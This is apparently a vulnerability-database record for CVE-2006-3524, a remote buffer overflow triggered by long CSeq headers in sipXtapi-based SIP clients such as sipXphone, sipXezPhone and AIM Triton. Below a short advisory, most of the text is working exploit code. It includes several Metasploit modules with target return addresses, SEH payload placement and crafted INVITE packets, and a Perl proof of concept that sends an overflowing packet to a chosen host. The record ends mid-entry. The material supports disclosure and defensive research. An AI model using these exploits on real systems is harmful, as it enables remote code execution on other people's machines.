Background
The Session Initiation Protocol (SIP) is a signaling protocol for a variety of uses, including instant messaging and Voice over Internet Protocol. sipXtapi is a client library for SIP-based user agents. It is included in Pingtel and AIM Triton products.
Problem
sipXtapi versions built prior to March 24, 2006 are affected by a buffer overflow vulnerability when processing long CSeq headers. This vulnerability could allow a remote attacker to execute arbitrary commands.
Resolution
A patch is available within the sipXtapi source tree. Compile from the latest sources or install the latest version of Pingtel or AIM Triton products.
Limitations
Exploit works on sipXtapi versions WIN32_2006-02-01b and WIN32_2006-03-10.
Platforms
Windows
{"enchantments": {"score": {"value": 8.6, "vector": "NONE", "modified": "2016-10-03T15:02:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3524"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82931", "PACKETSTORM:83094", "PACKETSTORM:83080"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SIP/AIM_TRITON_CSEQ", "MSF:EXPLOIT/WINDOWS/SIP/SIPXPHONE_CSEQ", "MSF:EXPLOIT/WINDOWS/SIP/SIPXEZPHONE_CSEQ"]}, {"type": "saint", "idList": ["SAINT:B1EE85BA43D9F6D0F7A422216D634076", "SAINT:66F2928947F2B882DE0E6AFE81C76D8A"]}, {"type": "exploitdb", "idList": ["EDB-ID:16352", "EDB-ID:16351", "EDB-ID:2000", "EDB-ID:16353"]}, {"type": "osvdb", "idList": ["OSVDB:27122"]}, {"type": "nessus", "idList": ["SIPXTAPI_CSEQ_OVERFLOW.NASL"]}], "modified": "2016-10-03T15:02:00", "rev": 2}, "vulnersScore": 8.6}, "reporter": "SAINT Corporation", "id": "SAINT:069D047A68E7FD9075AEACBBF45C1581", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "published": "2006-07-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "modified": "2006-07-17T00:00:00", "references": [], "cvelist": ["CVE-2006-3524"], "description": "Added: 07/17/2006 \nCVE: [CVE-2006-3524](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524>) \nBID: [18906](<http://www.securityfocus.com/bid/18906>) \nOSVDB: [27122](<http://www.osvdb.org/27122>) \n\n\n### Background\n\nThe [Session Initiation Protocol](<http://www.cs.columbia.edu/sip/>) (SIP) is a signaling protocol for a variety of uses, including instant messanging and Voice over Internet Protocol. [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) is a client library for SIP-based user agents. It is included in [Pingtel](<http://www.pingtel.com/>) and [AIM Triton](<http://www.aim.com>) products. \n\n### Problem\n\nsipXtapi versions built prior to March 24, 2006 are affected by a buffer overflow vulnerability when processing long CSeq headers. 
This vulnerability could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nA patch is available within the [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) source tree. Compile from the latest sources or install the latest version of [Pingtel](<http://www.pingtel.com>) or [AIM Triton](<http://www.aim.com>) products. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0160.html> \n\n\n### Limitations\n\nExploit works on sipXtapi versions WIN32_2006-02-01b and WIN32_2006-03-10. \n\n### Platforms\n\nWindows \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/sipxtapi_cseq", "lastseen": "2016-10-03T15:02:00", "edition": 1, "title": "sipXtapi Cseq header buffer overflow", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:22", "description": "Buffer overflow in SIPfoundry sipXtapi released before 20060324 allows remote attackers to execute arbitrary code via a long CSeq field value in an INVITE message.", "edition": 4, "cvss3": {}, "published": "2006-07-12T00:05:00", "title": "CVE-2006-3524", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-3524"], "modified": "2018-10-18T16:47:00", "cpe": ["cpe:/a:sipfoundry:sipxtapi:*"], "id": "CVE-2006-3524", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3524", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sipfoundry:sipxtapi:*:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "description": "Added: 07/17/2006 \nCVE: [CVE-2006-3524](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524>) \nBID: [18906](<http://www.securityfocus.com/bid/18906>) \nOSVDB: [27122](<http://www.osvdb.org/27122>) \n\n\n### Background\n\nThe [Session Initiation Protocol](<http://www.cs.columbia.edu/sip/>) (SIP) is a signaling protocol for a variety of uses, including instant messanging and Voice over Internet Protocol. [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) is a client library for SIP-based user agents. It is included in [Pingtel](<http://www.pingtel.com/>) and [AIM Triton](<http://www.aim.com>) products. 
\n\n### Problem\n\nsipXtapi versions built prior to March 24, 2006 are affected by a buffer overflow vulnerability when processing long CSeq headers. This vulnerability could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nA patch is available within the [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) source tree. Compile from the latest sources or install the latest version of [Pingtel](<http://www.pingtel.com>) or [AIM Triton](<http://www.aim.com>) products. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0160.html> \n\n\n### Limitations\n\nExploit works on sipXtapi versions WIN32_2006-02-01b and WIN32_2006-03-10. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2006-07-17T00:00:00", "published": "2006-07-17T00:00:00", "id": "SAINT:66F2928947F2B882DE0E6AFE81C76D8A", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/sipxtapi_cseq", "title": "sipXtapi Cseq header buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "edition": 2, "description": "Added: 07/17/2006 \nCVE: [CVE-2006-3524](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524>) \nBID: [18906](<http://www.securityfocus.com/bid/18906>) \nOSVDB: [27122](<http://www.osvdb.org/27122>) \n\n\n### Background\n\nThe [Session Initiation Protocol](<http://www.cs.columbia.edu/sip/>) (SIP) is a signaling protocol for a variety of uses, including instant messanging and Voice over Internet Protocol. [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) is a client library for SIP-based user agents. It is included in [Pingtel](<http://www.pingtel.com/>) and [AIM Triton](<http://www.aim.com>) products. \n\n### Problem\n\nsipXtapi versions built prior to March 24, 2006 are affected by a buffer overflow vulnerability when processing long CSeq headers. 
This vulnerability could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nA patch is available within the [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) source tree. Compile from the latest sources or install the latest version of [Pingtel](<http://www.pingtel.com>) or [AIM Triton](<http://www.aim.com>) products. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0160.html> \n\n\n### Limitations\n\nExploit works on sipXtapi versions WIN32_2006-02-01b and WIN32_2006-03-10. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-07-17T00:00:00", "published": "2006-07-17T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/sipxtapi_cseq", "id": "SAINT:B1EE85BA43D9F6D0F7A422216D634076", "title": "sipXtapi Cseq header buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:02", "description": "", "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82931", "href": "https://packetstormsecurity.com/files/82931/SIPfoundry-sipXphone-2.6.0.27-CSeq-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Udp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in SIPfoundry's \nsipXphone 2.6.0.27. By sending an overly long CSeq value, \na remote attacker could overflow a buffer and execute \narbitrary code on the system with the privileges of \nthe affected application. \n}, \n'Author' => 'MC', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-3524'], \n['OSVDB', '27122'], \n['BID', '18906'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'July 10 2006', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(5060) \n], self) \n \nend \n \ndef exploit \nconnect_udp \n \nuser = rand_text_english(2, payload_badchars) \nport = rand(65535).to_s \nfiller = rand_text_english(212, payload_badchars) \nseh = generate_seh_payload(target.ret) \nfiller[204, seh.length] = seh \n \nsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\" \nsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\" \nsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\" \nsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\" \nsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\" \nsploit << \"CSeq: \" + filler + \"\\r\\n\" \nsploit << \"Max-Forwards: 20\" + \"\\r\\n\" \nsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nudp_sock.put(sploit) \n 
\nhandler \ndisconnect_udp \n \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82931/sipxphone_cseq.rb.txt"}, {"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "AIM Triton 1.0.4 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83080", "href": "https://packetstormsecurity.com/files/83080/AIM-Triton-1.0.4-CSeq-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Udp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AIM Triton 1.0.4 CSeq Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in AOL's AIM \nTriton 1.0.4. By sending an overly long CSeq value, \na remote attacker could overflow a buffer and execute \narbitrary code on the system with the privileges of \nthe affected application. 
\n}, \n'Author' => 'MC', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-3524'], \n['OSVDB', '27122' ], \n['BID', '18906'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll \n], \n'Privileged' => false, \n'DisclosureDate' => 'July 10 2006', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(5061) \n], self) \n \nend \n \ndef exploit \nconnect_udp \n \nuser = rand_text_english(2, payload_badchars) \nport = rand(65535).to_s \nfiller = rand_text_english(792, payload_badchars) \nseh = generate_seh_payload(target.ret) \nfiller[780, seh.length] = seh \n \nsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\" \nsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\" \nsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\" \nsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\" \nsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\" \nsploit << \"CSeq: \" + filler + \"\\r\\n\" \nsploit << \"Max-Forwards: 20\" + \"\\r\\n\" \nsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nudp_sock.put(sploit) \n \nhandler \ndisconnect_udp \n \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83080/aim_triton_cseq.rb.txt"}, {"lastseen": "2016-12-05T22:11:33", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83094", "href": 
"https://packetstormsecurity.com/files/83094/SIPfoundry-sipXezPhone-0.35a-CSeq-Field-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Udp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in SIPfoundry's \nsipXezPhone version 0.35a. By sending an long CSeq header, \na remote attacker could overflow a buffer and execute \narbitrary code on the system with the privileges of \nthe affected application. \n}, \n'Author' => 'MC', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-3524'], \n['OSVDB', '27122'], \n['BID', '18906'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n \n'Targets' => \n[ \n['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ], \n], \n \n'Privileged' => false, \n \n'DisclosureDate' => 'July 10 2006', \n \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(5060) \n], self.class) \nend \n \ndef exploit \nconnect_udp \n \nprint_status(\"Trying target #{target.name}...\") \n \nuser = rand_text_english(2, payload_badchars) \nport = rand(65535).to_s \nfiller = rand_text_english(260, payload_badchars) \nseh = generate_seh_payload(target.ret) \nfiller[252, seh.length] = seh \n \nsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\" \nsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\" \nsploit << \"Via: 
SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\" \nsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\" \nsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\" \nsploit << \"CSeq: \" + filler + \"\\r\\n\" \nsploit << \"Max-Forwards: 20\" + \"\\r\\n\" \nsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\" \n \nudp_sock.put(sploit) \n \nhandler \ndisconnect_udp \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83094/sipxezphone_cseq.rb.txt"}], "exploitdb": [{"lastseen": "2016-01-31T15:19:08", "description": "SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC. CVE-2006-3524. Dos exploit for hardware platform", "published": "2006-07-10T00:00:00", "type": "exploitdb", "title": "SIPfoundry sipXtapi CSeq Remote Buffer Overflow Exploit PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2006-07-10T00:00:00", "id": "EDB-ID:2000", "href": "https://www.exploit-db.com/exploits/2000/", "sourceData": "#!/usr/bin/perl\n# PoC Exploit By mthumann@ernw.de\n# Remote Buffer Overflow in sipXtapi\n\nuse IO::Socket;\n#use strict;\n\n\nprint \"sipXtapi Exploit by Michael Thumann \\n\\n\";\n\nif (not $ARGV[0]) {\n print \"Usage: sipx.pl <host>\\n\";\nexit;}\n\n$target=$ARGV[0];\nmy $source =\"127.0.0.1\";\nmy $target_port = 5060;\nmy $user =\"bad\";\nmy $eip=\"\\x41\\x41\\x41\\x41\";\nmy $cseq =\n\"\\x31\\x31\\x35\\x37\\x39\\x32\\x30\\x38\".\n\"\\x39\\x32\\x33\\x37\\x33\\x31\\x36\\x31\".\n\"\\x39\\x35\\x34\\x32\\x33\\x35\\x37\\x30\".\n$eip;\nmy $packet =<<END;\nINVITE sip:user\\@$source SIP/2.0\\r\nTo: <sip:$target:$target_port>\\r\nVia: SIP/2.0/UDP $target:3277\\r\nFrom: \"moz\"<sip:$target:3277>\\r\nCall-ID: 3121$target\\r\nCSeq: $cseq\\r\nMax-Forwards: 70\\r\nContact: <sip:$source:5059>\\r\n\\r\nEND\n\nprint \"Sending Packet to: \" . $target . 
\"\\n\\n\";\nsocket(PING, PF_INET, SOCK_DGRAM, getprotobyname(\"udp\"));\nmy $ipaddr = inet_aton($target);\nmy $sendto = sockaddr_in($target_port,$ipaddr);\nsend(PING, $packet, 0, $sendto) == length($packet) or die \"cannot send to $target : $target_port : $!\\n\";\nprint \"Done.\\n\";\n\n#EoF\n\n# milw0rm.com [2006-07-10]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2000/"}, {"lastseen": "2016-02-01T23:40:32", "description": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow. CVE-2006-3524. Remote exploit for windows platform", "published": "2010-06-15T00:00:00", "type": "exploitdb", "title": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2010-06-15T00:00:00", "id": "EDB-ID:16351", "href": "https://www.exploit-db.com/exploits/16351/", "sourceData": "##\r\n# $Id: sipxezphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\r\n\t\t\t\tsipXezPhone version 0.35a. 
By sending an long CSeq header,\r\n\t\t\t\ta remote attacker could overflow a buffer and execute\r\n\t\t\t\tarbitrary code on the system with the privileges of\r\n\t\t\t\tthe affected application.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3524'],\r\n\t\t\t\t\t['OSVDB', '27122'],\r\n\t\t\t\t\t['BID', '18906'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 400,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ],\r\n\t\t\t\t],\r\n\r\n\t\t\t'Privileged' => false,\r\n\r\n\t\t\t'DisclosureDate' => 'Jul 10 2006',\r\n\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(5060)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tuser = rand_text_english(2, payload_badchars)\r\n\t\tport = rand(65535).to_s\r\n\t\tfiller = rand_text_english(260, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tfiller[252, seh.length] = seh\r\n\r\n\t\tsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\r\n\t\tsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\r\n\t\tsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\r\n\t\tsploit << \"CSeq: \" + filler + \"\\r\\n\"\r\n\t\tsploit << \"Max-Forwards: 20\" + \"\\r\\n\"\r\n\t\tsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + 
\"\\r\\n\\r\\n\"\r\n\r\n\t\tudp_sock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16351/"}, {"lastseen": "2016-02-01T23:40:42", "description": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow. CVE-2006-3524. Remote exploit for windows platform", "published": "2010-06-15T00:00:00", "type": "exploitdb", "title": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2010-06-15T00:00:00", "id": "EDB-ID:16352", "href": "https://www.exploit-db.com/exploits/16352/", "sourceData": "##\r\n# $Id: sipxphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\r\n\t\t\t\tsipXphone 2.6.0.27. 
By sending an overly long CSeq value,\r\n\t\t\t\ta remote attacker could overflow a buffer and execute\r\n\t\t\t\tarbitrary code on the system with the privileges of\r\n\t\t\t\tthe affected application.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-3524' ],\r\n\t\t\t\t\t[ 'OSVDB', '27122' ],\r\n\t\t\t\t\t[ 'BID', '18906' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 400,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jul 10 2006',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(5060)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tuser = rand_text_english(2, payload_badchars)\r\n\t\tport = rand(65535).to_s\r\n\t\tfiller = rand_text_english(212, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tfiller[204, seh.length] = seh\r\n\r\n\t\tsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\r\n\t\tsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\r\n\t\tsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\r\n\t\tsploit << \"CSeq: \" + filler + \"\\r\\n\"\r\n\t\tsploit << \"Max-Forwards: 20\" + \"\\r\\n\"\r\n\t\tsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying target 
#{target.name}...\")\r\n\r\n\t\tudp_sock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16352/"}, {"lastseen": "2016-02-01T23:40:49", "description": "AIM Triton 1.0.4 CSeq Buffer Overflow. CVE-2006-3524. Remote exploit for windows platform", "published": "2010-06-15T00:00:00", "type": "exploitdb", "title": "AIM Triton 1.0.4 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2010-06-15T00:00:00", "id": "EDB-ID:16353", "href": "https://www.exploit-db.com/exploits/16353/", "sourceData": "##\r\n# $Id: aim_triton_cseq.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'AIM 